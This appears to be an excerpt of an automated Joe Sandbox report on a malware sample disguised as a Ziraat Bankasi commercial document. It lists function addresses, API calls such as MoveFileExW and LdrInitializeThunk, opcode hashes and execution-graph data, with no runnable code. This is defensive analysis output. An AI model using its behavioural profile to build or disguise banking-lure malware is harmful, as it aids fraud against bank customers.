                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00FCD60F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1740691023.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_fc0000_ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0
                                        • Opcode ID: 780e9f38632c9103b8e16194336792a6d3b9359d286d3e587335684767d513fd
                                        • Instruction ID: 9d0d0674fedc60d5e7d624c8ff7e7c7d3ef206bf0fbf883ae9e90c683ac8c5d6
                                        • Opcode Fuzzy Hash: 780e9f38632c9103b8e16194336792a6d3b9359d286d3e587335684767d513fd
                                        • Instruction Fuzzy Hash: F721E5B5D002099FDB10CF9AD985AEEBFF8EB48310F14841AE918A3310D378A954DFA5
                                        Function 00FCD588 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 462 fcd588-fcd61c DuplicateHandle 464 fcd61e-fcd624 462->464 465 fcd625-fcd642 462->465 464->465
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00FCD60F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1740691023.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_fc0000_ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0
                                        • Opcode ID: d36f368e549aff96070f42eb73b9fdc7707b4a278d6ce246acd27c9d928009e8
                                        • Instruction ID: 836b0a8cbc943843c5509782881fd1a15f150e0803e860376c4b2bf57477623e
                                        • Opcode Fuzzy Hash: d36f368e549aff96070f42eb73b9fdc7707b4a278d6ce246acd27c9d928009e8
                                        • Instruction Fuzzy Hash: E821E4B59002099FDB10CF9AD985ADEBBF8EB48310F14841AE918A3310D378A944DF64
                                        Function 00FCB298 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 468 fcb298-fcb2d8 470 fcb2da-fcb2dd 468->470 471 fcb2e0-fcb30b GetModuleHandleW 468->471 470->471 472 fcb30d-fcb313 471->472 473 fcb314-fcb328 471->473 472->473
                                        APIs
                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 00FCB2FE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1740691023.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_fc0000_ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID:
                                        • API String ID: 4139908857-0
                                        • Opcode ID: d34ce7a4ceabdf729b4c18122b93eba92c1c213e0307e563842e20affa6774dd
                                        • Instruction ID: d396ad8d9eb505ff6165caae4d68a6fd0a5b69834c51cb1329aa89f78a5dbf17
                                        • Opcode Fuzzy Hash: d34ce7a4ceabdf729b4c18122b93eba92c1c213e0307e563842e20affa6774dd
                                        • Instruction Fuzzy Hash: A711DFB5C002498FCB20CF9AD945BDEFBF8EF88324F14841AD829A7610C379A545CFA5
                                        Function 00BCD4C4 Relevance: .1, Instructions: 75COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1740382400.0000000000BCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BCD000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bcd000_ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2240c5cbfd4dbf426c91ad213a76e345632ca462083a43b542162b0ccb1a1156
                                        • Instruction ID: 2c7787ab8cef4846d04da6096b216eaef19fbcbb0dcc6f7d7c8ad46124634cdb
                                        • Opcode Fuzzy Hash: 2240c5cbfd4dbf426c91ad213a76e345632ca462083a43b542162b0ccb1a1156
                                        • Instruction Fuzzy Hash: FF21F179504240DFDB15DF14D9C0F26BFA5FBA8318F24C5BDE9090B256C336D816DAA2
                                        Function 00BDD01C Relevance: .1, Instructions: 72COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1740450113.0000000000BDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BDD000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bdd000_ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8e6825276a94967757e1b03f9bf72ac746f0077a5e0f95cf09381ce901af6381
                                        • Instruction ID: 0cded24735f3ba4ffd9d3dbf35370d8cec832f1d50e519cbf47833912aa29bf0
                                        • Opcode Fuzzy Hash: 8e6825276a94967757e1b03f9bf72ac746f0077a5e0f95cf09381ce901af6381
                                        • Instruction Fuzzy Hash: F421D375504204DFDB14DF24D9D0B26FBA5EB88314F24C5AED88A4B356D33AD806CA61
                                        Function 00BDD005 Relevance: .1, Instructions: 60COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1740450113.0000000000BDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BDD000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bdd000_ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: af1f5077a7fe184fcc8f214a2a1321f1b6f74e2067d1009d60bb8af2031f26e0
                                        • Instruction ID: 126f13763ee18010d60c79c51a25f8690ba65d25f772d1637e38bf9a725c104b
                                        • Opcode Fuzzy Hash: af1f5077a7fe184fcc8f214a2a1321f1b6f74e2067d1009d60bb8af2031f26e0
                                        • Instruction Fuzzy Hash: 232195755093808FCB12CF24D590715FF71EB45314F28C5DBD8898B697C33A980ACB62
                                        Function 00BCD4BF Relevance: .1, Instructions: 56COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1740382400.0000000000BCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BCD000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bcd000_ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cfecef471a1453859a8b82362a9b5b8fd1010b8d5ec4de2bf4e3328547185874
                                        • Instruction ID: 13571422defb890bc8301b146503f67e57604bcb2607789c0dceb854eabf9d2c
                                        • Opcode Fuzzy Hash: cfecef471a1453859a8b82362a9b5b8fd1010b8d5ec4de2bf4e3328547185874
                                        • Instruction Fuzzy Hash: 4911B176504280CFCB16CF14D9C4B16BFB1FB98314F24C6ADD8494B656C33AD85ACBA2
                                        Function 00BCD731 Relevance: .0, Instructions: 45COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1740382400.0000000000BCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BCD000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bcd000_ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7ae854662c91b6089ca1db04262777d93a15c5a239eecefbae00a563fe98a01b
                                        • Instruction ID: 0aa31494aac318379db57ca99546c657ebd4677b37198f788126c4b01c7c0756
                                        • Opcode Fuzzy Hash: 7ae854662c91b6089ca1db04262777d93a15c5a239eecefbae00a563fe98a01b
                                        • Instruction Fuzzy Hash: AC01A2751043449AE7219A29CDC4F76BFD8EF95324F2884AFED095A282D67C9C40CAB1
                                        Function 00BCD730 Relevance: .0, Instructions: 36COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1740382400.0000000000BCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BCD000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bcd000_ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 014ce864a9bc3f1df14a22dec852cbdc8bf89e8c47b3ee6ecf59077189ba6dbd
                                        • Instruction ID: c27aec8b10e087cc3d04bdddcec53530b95aec3a735e54bf5819f4a8bcc6d342
                                        • Opcode Fuzzy Hash: 014ce864a9bc3f1df14a22dec852cbdc8bf89e8c47b3ee6ecf59077189ba6dbd
                                        • Instruction Fuzzy Hash: 0FF0C236104244AAE7208A15CC84B66FFD8EB91334F18C46FED085F282C2789C44CA70

                                        Non-executed Functions

                                        Function 00FCDE4C Relevance: .3, Instructions: 264COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1740691023.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_fc0000_ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c7af413e7c3137a4d659cefe9dbb0dc009a693a18912ad3c5d8ef811ceab5429
                                        • Instruction ID: f921b395442596c4dee3651d3deec88c7c1ebf4ec2ebdfb8d2357569a06465ca
                                        • Opcode Fuzzy Hash: c7af413e7c3137a4d659cefe9dbb0dc009a693a18912ad3c5d8ef811ceab5429
                                        • Instruction Fuzzy Hash: A2A16C32E002068FCF09DFA4CA81A9EB7B2FF84310B15457EE906AF265DB35E955DB40

                                        Execution Graph

                                        Execution Coverage:18.2%
                                        Dynamic/Decrypted Code Coverage:100%
                                        Signature Coverage:10%
                                        Total number of Nodes:80
                                        Total number of Limit Nodes:11
                                        execution_graph 20723 6f3a0d0 20725 6f3a0fd 20723->20725 20724 6f3bfdf 20725->20724 20728 6f3a406 20725->20728 20729 6f39788 20725->20729 20727 6f39788 LdrInitializeThunk 20727->20728 20728->20724 20728->20727 20731 6f39789 20729->20731 20730 6f3979a 20730->20728 20731->20730 20732 6f39ec9 LdrInitializeThunk 20731->20732 20732->20730 20733 191ced8 20734 191cee4 20733->20734 20738 6f329c8 20734->20738 20749 6f329b8 20734->20749 20735 191cf98 20740 6f329ea 20738->20740 20739 6f32dd1 20739->20735 20740->20739 20743 6f39788 LdrInitializeThunk 20740->20743 20760 6f39779 20740->20760 20766 6f39d8c 20740->20766 20772 6f399a8 20740->20772 20741 6f32ab6 20741->20739 20778 6f3cb68 20741->20778 20785 6f3cd03 20741->20785 20792 6f3cb65 20741->20792 20743->20741 20751 6f329bc 20749->20751 20750 6f32dd1 20750->20735 20751->20750 20753 6f39779 2 API calls 20751->20753 20754 6f39788 LdrInitializeThunk 20751->20754 20755 6f399a8 2 API calls 20751->20755 20756 6f39d8c 2 API calls 20751->20756 20752 6f32ab6 20752->20750 20757 6f3cd03 4 API calls 20752->20757 20758 6f3cb65 4 API calls 20752->20758 20759 6f3cb68 4 API calls 20752->20759 20753->20752 20754->20752 20755->20752 20756->20752 20757->20752 20758->20752 20759->20752 20765 6f3977c 20760->20765 20761 6f3979a 20761->20741 20762 6f39d84 LdrInitializeThunk 20762->20761 20764 6f39788 LdrInitializeThunk 20764->20765 20765->20761 20765->20762 20765->20764 20767 6f39c43 20766->20767 20768 6f39d84 LdrInitializeThunk 20767->20768 20771 6f39788 LdrInitializeThunk 20767->20771 20770 6f39ee1 20768->20770 20770->20741 20771->20767 20777 6f399a9 20772->20777 20773 6f39b39 20773->20741 20774 6f39d84 LdrInitializeThunk 20774->20773 20776 6f39788 LdrInitializeThunk 20776->20777 20777->20773 20777->20774 20777->20776 20779 6f3cb8f 20778->20779 20780 6f3ccab 20779->20780 20799 6f3cf5c 20779->20799 20803 6f3cfbc 20779->20803 20808 6f3ce10 20779->20808 20812 6f3ce20 20779->20812 20780->20741 20787 6f3cbc7 20785->20787 20786 6f3ccab 20786->20741 20787->20786 20788 6f3ce20 LdrInitializeThunk 20787->20788 20789 6f3ce10 LdrInitializeThunk 20787->20789 20790 6f3cfbc LdrInitializeThunk 20787->20790 20791 6f3cf5c LdrInitializeThunk 20787->20791 20788->20786 20789->20786 20790->20786 20791->20786 20793 6f3cb8f 20792->20793 20794 6f3ccab 20793->20794 20795 6f3ce20 LdrInitializeThunk 20793->20795 20796 6f3ce10 LdrInitializeThunk 20793->20796 20797 6f3cfbc LdrInitializeThunk 20793->20797 20798 6f3cf5c LdrInitializeThunk 20793->20798 20794->20741 20795->20794 20796->20794 20797->20794 20798->20794 20800 6f3cf3b 20799->20800 20801 6f3ce71 LdrInitializeThunk 20800->20801 20802 6f3ce7e 20800->20802 20801->20802 20802->20780 20804 6f3cf3b 20803->20804 20806 6f3cfc1 20803->20806 20805 6f3ce71 LdrInitializeThunk 20804->20805 20807 6f3ce7e 20804->20807 20805->20807 20806->20780 20807->20780 20809 6f3ce48 LdrInitializeThunk 20808->20809 20811 6f3ce7e 20809->20811 20811->20780 20813 6f3ce48 LdrInitializeThunk 20812->20813 20815 6f3ce7e 20813->20815 20815->20780 20816 191f138 20818 191f139 20816->20818 20817 191f142 20818->20817 20819 191f272 MoveFileExW 20818->20819 20820 191f2c7 20819->20820

                                        Executed Functions

                                        Function 06F399A8 Relevance: 1.9, APIs: 1, Instructions: 357COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4159738894.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_6f30000_ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5fb802250b4fce4cc04cb1cc100d0046abc22cf88de52c0c3e4f27888a693541
                                        • Instruction ID: f46e3d223ff928a18672d9833825993b14b569b59961c60da4ed2a0e264f6425
                                        • Opcode Fuzzy Hash: 5fb802250b4fce4cc04cb1cc100d0046abc22cf88de52c0c3e4f27888a693541
                                        • Instruction Fuzzy Hash: BAF1E874E01228CFDB54DFA9D884B9DFBB2BF88304F5481A9D408AB355EBB49985CF50
                                        Function 06F3CE20 Relevance: 1.6, APIs: 1, Instructions: 100libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4159738894.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_6f30000_ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: b7cc078312808e459801db7829803c4839bd590c86896f2cdc71c7dbd6e89450
                                        • Instruction ID: 446c55dede7fddd1d692bed66aeae9c500d1506ac75a33cc09106631dd14779b
                                        • Opcode Fuzzy Hash: b7cc078312808e459801db7829803c4839bd590c86896f2cdc71c7dbd6e89450
                                        • Instruction Fuzzy Hash: 8D4158B0E00219DFDB14CF99C584ADDFBB2FF88304F248169D4087B285C731A98ACBA0
                                        Function 06F30B30 Relevance: .7, Instructions: 709COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4159738894.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_6f30000_ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e8e2ed3b1c342950e1646506d37950285b2c63a0f28407b2e51472b3fc68ceba
                                        • Instruction ID: e4adf5d56f140647a915d293a1665b3d6de4500bc5747971af92c0b0b62f735d
                                        • Opcode Fuzzy Hash: e8e2ed3b1c342950e1646506d37950285b2c63a0f28407b2e51472b3fc68ceba
                                        • Instruction Fuzzy Hash: 6D729EB4E01229CFDB65DF69C984BEDBBB2BB49300F5481EAD409A7251DB349E81CF50
                                        Function 06F31848 Relevance: .3, Instructions: 268COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4159738894.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_6f30000_ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0e5461e860ef7fa33e16ccc914beeb35bcd9e82654c8f6660ca217031f3ca401
                                        • Instruction ID: 72e52e6f188558a756f2069be2bfdef77868747976d35abc31779c2c9ebcff8c
                                        • Opcode Fuzzy Hash: 0e5461e860ef7fa33e16ccc914beeb35bcd9e82654c8f6660ca217031f3ca401
                                        • Instruction Fuzzy Hash: DEC19F74E01218CFDB55DFA5D998BADBBB2BF88300F1080A9D809A7355DB399E85CF50
                                        Function 06F329C8 Relevance: .3, Instructions: 268COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4159738894.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_6f30000_ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 306776e0056c947d6b06d23107be0524f8c0831614cf28746c0b0fe57e98690d
                                        • Instruction ID: e5ddeeb73600d40c707a218c19e32669d94692231adb93efe56728244bdcc12f
                                        • Opcode Fuzzy Hash: 306776e0056c947d6b06d23107be0524f8c0831614cf28746c0b0fe57e98690d
                                        • Instruction Fuzzy Hash: 2FC19F74E00218CFDB55DFA5D994BADBBB2BF88300F1081A9D809A7355DB399E81CF50
                                        Function 06F33218 Relevance: .2, Instructions: 229COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4159738894.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_6f30000_ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 09926c885f84e318524b28ed6e77884a38145d5c1dcc4264931b337fe9ad3913
                                        • Instruction ID: fd1021d9387ceb00ae4f90603943edb40d01f80698531c771908e5e5d31097c9
                                        • Opcode Fuzzy Hash: 09926c885f84e318524b28ed6e77884a38145d5c1dcc4264931b337fe9ad3913
                                        • Instruction Fuzzy Hash: D2A1F471D00218CFEB54DFA9C984BADBBB1FF89310F208269E409AB391DB759985CF54
                                        Function 06F331F8 Relevance: .2, Instructions: 229COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4159738894.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_6f30000_ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6df98a7abc294405eeb63224287bd4d7a749e6895e594dc0cdf57530f44a1ab2
                                        • Instruction ID: d5181fcdbc3738b40deb5f2708924fe2df6d3a5592989cb3d4617e1096a40d49
                                        • Opcode Fuzzy Hash: 6df98a7abc294405eeb63224287bd4d7a749e6895e594dc0cdf57530f44a1ab2
                                        • Instruction Fuzzy Hash: 97A12571D00258CFDB15DFA8C994BDDBBB1FF89300F208269E409AB292DB749985CF54
                                        Function 06F33228 Relevance: .2, Instructions: 220COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4159738894.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_6f30000_ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fd11d78134858c80c9ae6a8c5f43fab13ead22bf9aa635a95df7857f76183689
                                        • Instruction ID: cbb62f3a40881eb0030f90a839ae1d4fdb0072fd9818e252329d40e107b7ee4c
                                        • Opcode Fuzzy Hash: fd11d78134858c80c9ae6a8c5f43fab13ead22bf9aa635a95df7857f76183689
                                        • Instruction Fuzzy Hash: 43A1F370D00219CFDB24DFA9C984BDDBBB1BF89310F208269E409AB3A1DB749985CF55
                                        Function 06F3356E Relevance: .2, Instructions: 202COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4159738894.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_6f30000_ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c715f16183c117c7fde6d562105cd3e790ec5d82949afeaee1ed162e9852cae2
                                        • Instruction ID: 66cfd0d06c29faf16224c9c61015681dd6439aab74ba4f61b3d443744e5425f7
                                        • Opcode Fuzzy Hash: c715f16183c117c7fde6d562105cd3e790ec5d82949afeaee1ed162e9852cae2
                                        • Instruction Fuzzy Hash: 9391D071D00259CFEB54DFA8C988B9CBBB1BF49310F208269E409AB291DB759985CF54
                                        Function 0191F138 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 164COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 2169 191f138-191f140 2171 191f142-191f144 2169->2171 2172 191f167-191f1da 2169->2172 2173 191f146-191f148 2171->2173 2174 191f14a-191f150 2171->2174 2187 191f1e1-191f23f 2172->2187 2188 191f1dc-191f1de 2172->2188 2173->2174 2176 191f152-191f155 2173->2176 2177 191f163-191f166 2174->2177 2178 191f157-191f159 2176->2178 2179 191f15b-191f15c 2176->2179 2178->2177 2179->2177 2190 191f241-191f250 2187->2190 2191 191f253-191f25e 2187->2191 2188->2187 2190->2191 2192 191f260-191f26f 2191->2192 2193 191f272-191f2c5 MoveFileExW 2191->2193 2192->2193 2194 191f2c7-191f2cd 2193->2194 2195 191f2ce-191f30c 2193->2195 2194->2195
                                        APIs
                                        • MoveFileExW.KERNELBASE(?,?,?,?), ref: 0191F2B5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4154159301.0000000001910000.00000040.00000800.00020000.00000000.sdmp, Offset: 01910000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_1910000_ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.jbxd
                                        Similarity
                                        • API ID: FileMove
                                        • String ID: H~q
                                        • API String ID: 3562171763-3865337841
                                        • Opcode ID: e666029f948284aa2345d99ce6198f44d64500838f0b98e767c53b097f35f920
                                        • Instruction ID: 481356ee96df810a49d823875941503bbd6e024d4a5985588a6093014106f037
                                        • Opcode Fuzzy Hash: e666029f948284aa2345d99ce6198f44d64500838f0b98e767c53b097f35f920
                                        • Instruction Fuzzy Hash: 3351F474E0524CDFDB04CFA9C984A9EBBF6FF89300F24846AE419AB354D734A946CB54
                                        Function 06F3CFBC Relevance: 1.6, APIs: 1, Instructions: 110COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4159738894.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_6f30000_ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 63c9af9175abe22528fccf310c5e46b723cafed23382ba9ffccae1fd661db503
                                        • Instruction ID: b4e556d37cf3199336ea9797a2065a74029a155b16556f0e3ac9240e319ec27f
                                        • Opcode Fuzzy Hash: 63c9af9175abe22528fccf310c5e46b723cafed23382ba9ffccae1fd661db503
                                        • Instruction Fuzzy Hash: 17414875D04128DFDB44DFA8C4C4AECBBB2FF89310F649159D41AAB285C735A986CFA0
                                        Function 06F3CF5C Relevance: 1.6, APIs: 1, Instructions: 102COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4159738894.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_6f30000_ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6e8bffbf1ef90a79d07d2dd702b11c76f9b9b0e23f79aeac72f56dd8974edafe
                                        • Instruction ID: 79b9d3d62ebe564ce3f7e0cedea372cf8d0bb07857e02d2417a3e4465b6e5141
                                        • Opcode Fuzzy Hash: 6e8bffbf1ef90a79d07d2dd702b11c76f9b9b0e23f79aeac72f56dd8974edafe
                                        • Instruction Fuzzy Hash: F0411774D04229DFDB44CFA8D084ADCBBB2FF49314F249159E419BB285C735A986CFA0
                                        Function 06F3CE10 Relevance: 1.6, APIs: 1, Instructions: 69libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4159738894.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_6f30000_ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 9f0948388ac9c82b437e138fc5a4c903c7aaebd5b12f1b7a18ecd62d496c8a4d
                                        • Instruction ID: a280b27baec4ec814fb7923802ca0be9c1dafd13ecf1961810aacfb8a845ee1d
                                        • Opcode Fuzzy Hash: 9f0948388ac9c82b437e138fc5a4c903c7aaebd5b12f1b7a18ecd62d496c8a4d
                                        • Instruction Fuzzy Hash: CD214AB1D012189BDB18CFAAD888ADEFBF6AFC8310F149525D414B7254D774598ACBA0
                                        Function 06F39D8C Relevance: 1.6, APIs: 1, Instructions: 62libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LdrInitializeThunk.NTDLL(00000000), ref: 06F39ECE
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4159738894.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_6f30000_ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: f542afba5c2a51c72431a2408a6ba7e890ba8421b6102fd12dbff6239312285a
                                        • Instruction ID: 268665325818d86c955b2cf1fbdf14b9206989609abed3b7a077b6dfa641e787
                                        • Opcode Fuzzy Hash: f542afba5c2a51c72431a2408a6ba7e890ba8421b6102fd12dbff6239312285a
                                        • Instruction Fuzzy Hash: 7A114C75E002299FDB44DFA8D884AEDBBB5FB88314F548165E904A7346E7B0A981CB60
                                        Function 0151D006 Relevance: .1, Instructions: 74COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4152924438.000000000151D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0151D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_151d000_ziraat bankasi_TRY M#U00fc#U015fteri No_11055699-1034 nolu TICARI 26.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 25c3110879710e61369720a0fd1cb736e4ec00c48d0d2538a64806e1973b325f
                                        • Instruction ID: 82b7f833dc55258a66baa2a48d5f5c3db0742766c4a817823e6e0e6571b970e7
